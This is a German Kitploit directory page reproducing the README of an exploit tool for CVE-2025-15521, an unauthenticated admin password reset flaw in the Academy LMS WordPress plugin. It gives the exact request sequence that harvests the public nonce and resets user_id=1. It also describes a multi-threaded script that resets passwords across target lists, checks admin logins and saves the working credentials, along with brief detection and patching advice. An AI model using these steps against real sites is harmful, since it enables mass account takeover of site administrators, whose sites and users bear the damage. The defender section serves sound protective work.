Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-15521 — Das Academy LMS – WordPress LMS Plugin für Complete eLearning Solution Plugin für WordPress ist anfällig für Privilegienerweiterung durch Kontoübernahme in allen Versionen bis einschließlich 3.5.0. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-15521
AufklärungPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsAuthentifizierung
GitHubnxploited/cve-2025-15521

CVE-2025-15521

Das Academy LMS – WordPress LMS Plugin für Complete eLearning Solution Plugin für WordPress ist anfällig für Privilegienerweiterung durch Kontoübernahme in allen Versionen bis einschließlich 3.5.0.

11vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2025-15521

Das Academy LMS – WordPress LMS Plugin für die komplette eLearning-Lösung Plugin für WordPress ist in allen Versionen bis einschließlich 3.5.0 anfällig für Privilegieneskalation durch Accountübernahme.

root@kitploit:~
 _____ _____ _____     ___ ___ ___ ___     ___   ___ ___ ___ ___  
|     |  |  |   __|___|_  |   |_  |  _|___|_  | |  _|  _|_  |_  | 
|   --|  |  |   __|___|  _| | |  _|_  |___|_| |_|_  |_  |  _|_| |_
|_____|\___/|_____|   |___|___|___|___|   |_____|___|___|___|_____|

Telegram CVE CVSS Python

📡 Folge @KNxploited — CVE-Offenlegungen und funktionierende Exploits, ohne Verzögerung.


Was ist das

CVE-2025-15521 — Nicht authentifizierte Accountübernahme durch Passwortzurücksetzung in Academy LMS ≤ 3.5.0.

Der Reset-Handler des Plugins authentifiziert die Anfrage nur mittels eines öffentlich zugänglichen Nonce (academy_nonce), der in Kursseiten eingebettet ist. Kein Token wird an die E-Mail des Benutzers gesendet. Keine Sitzungsprüfung. Keine Identitätsvalidierung. Ein Angreifer, der eine beliebige Kursseite liest, erhält einen gültigen Nonce und kann dann das Passwort eines beliebigen Kontos zurücksetzen, indem er eine user_id angibt – einschließlich user_id=1 (der Site-Administrator).

CVSS 3.1: 9.8 Kritisch — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNA: Wordfence


Wie die Sicherheitslücke funktioniert

root@kitploit:~
GET /course/any-course/
  → HTML contains: "academy_nonce": "a1b2c3d4e5"   ← public, no auth

POST /academy-retrieve-password/?user_id=1
  new_password=<anything>
  confirm_new_password=<anything>
  security=a1b2c3d4e5                               ← nonce accepted

  → Password for user_id=1 changed. No email. No confirmation.

Der Handler ruft wp_set_password() auf, nachdem er lediglich wp_verify_nonce() für einen Nonce überprüft hat, der jedem Besucher ausgeliefert wird. Es wird nicht geprüft, ob der anfragende Benutzer der Inhaber des zu ändernden Kontos ist.


Was dieses Skript macht

  1. Durchsucht Kursseiten, um einen aktuellen academy_nonce zu extrahieren
  2. Sendet den Reset-Handler für eine Ziel-user_id mit einem gewählten Passwort
  3. Ermittelt Benutzernamen über /?author=N-Weiterleitungen und die REST-API (/wp-json/wp/v2/users)
  4. Versucht einen strengen Login für jeden Kandidaten:
    • Lehnt bekannte Fehlermeldungen ab
    • Erfordert wordpress_logged_in-Cookie
    • Erfordert echte Admin-UI-Marker in /wp-admin – nicht nur eine 200-Antwort
  5. Schreibt bestätigte Zugangseinträge in eine Ausgabedatei – nichts Sensibles wird im Terminal angezeigt

Anforderungen

root@kitploit:~
pip install requests colorama urllib3

Python 3.8+ erforderlich. Python 3.10+ empfohlen.


Verwendung

root@kitploit:~
python CVE-2025-15521.py

Sie werden zur Eingabe aufgefordert:

root@kitploit:~
Ziel-Listendatei (eine URL pro Zeile): list.txt
Threads (gleichzeitige Sites) [5]: 10
Reset-Handler-Pfad [/academy-retrieve-password/]:
Kurs-Root-Pfad (Schlüsselquelle) [/course/]:
Maximale Anzahl an /course/-Unterseiten pro Site [15]:
user_id zum Zurücksetzen (Handler-Ziel) [1]:
Neues Passwort festlegen [adminSA]:
HTTP-Timeout (Sekunden) [10]:
Ausgabedatei [scan_results/academy_access_success.txt]:

Ziel-Datei — eine URL pro Zeile, Schema optional:

root@kitploit:~
https://target1.com
target2.com
https://target3.com/lms

Ausgabe

Terminal — eine Zeile pro Ziel, keine Anmeldedaten werden angezeigt:

root@kitploit:~
[14:02:11] [https://target.com] KEY: OK   | RESET: OK   | ACCESS: 1 HIT
[14:02:13] [https://target2.com] KEY: FAIL | RESET: -    | ACCESS: 0 HIT

Datei — nur bestätigte Zugangseinträge:

root@kitploit:~
[2025-04-18T14:02:11] https://target.com - account=admin  pass=adminSA

Erkennung & Behebung

Für Verteidiger:

Blockieren oder überwachen Sie nicht authentifizierte POST-Anfragen an den Reset-Endpunkt:

root@kitploit:~
POST *academy-retrieve-password* with parameter: security=

Überprüfen Sie die Offenlegung von rm_admin_order / academy_nonce im Kursseitenquellcode Ihres Themes. Wenn der Nonce ohne Anmeldung sichtbar ist – ist Ihre Version betroffen.

Sofortmaßnahmen:

  • Aktualisieren Sie Academy LMS auf eine Version über 3.5.0
  • Deaktivieren Sie das Plugin vorübergehend, wenn kein Patch verfügbar ist
  • Überprüfen Sie kürzlich geänderte Admin-Passwörter
  • Erzwingen Sie Passwortzurücksetzungen für alle Administratorkonten
  • Implementieren Sie eine e-Mail-basierte Token-Verifizierung für jeden Passwortzurücksetzungsablauf

⚠️ Haftungsausschluss

Dieses Tool ist nur für autorisierte Sicherheitsforschung und Penetrationstests bestimmt.
Führen Sie es nur gegen Systeme aus, die Ihnen gehören oder für die Sie ausdrückliche schriftliche Erlaubnis zum Testen haben.
Der Autor übernimmt keine Haftung für unbefugte oder illegale Nutzung.
Unbefugte Nutzung verstößt gegen CFAA, CMA, EU-Richtlinie 2013/40/EU, Saudi-Arabiens Anti-Cyber-Crime-Gesetz Nr. M/17 und gleichwertige Gesetze weltweit.


By Nxploited (Khaled Alenazi)
t.me/KNxploited · github.com/Nxploited

🔔 Folge @KNxploited auf Telegram für die neuesten CVEs und Exploit-Veröffentlichungen.

Tool herunterladen